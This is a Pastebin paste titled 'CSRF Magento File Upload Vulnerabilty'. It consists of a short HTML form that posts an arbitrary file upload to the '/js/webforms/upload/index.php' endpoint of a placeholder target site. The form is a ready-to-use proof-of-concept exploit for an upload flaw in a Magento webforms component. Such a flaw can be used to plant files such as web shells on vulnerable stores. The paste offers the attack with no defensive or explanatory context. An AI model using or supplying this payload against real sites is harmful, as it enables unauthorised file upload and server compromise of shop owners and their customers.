Advertisement
GLADzTeguhID

CSRF Magento File Upload Vulnerabilty

Aug 17th, 2016
465
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 0.18 KB | None | 0 0
  1. <form method="POST" action="https://site.Target.com/js/webforms/upload/index.php"
  2. enctype="multipart/form-data">
  3. <input type="file" name="files[]" /><button>Upload</button>
  4. </form>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement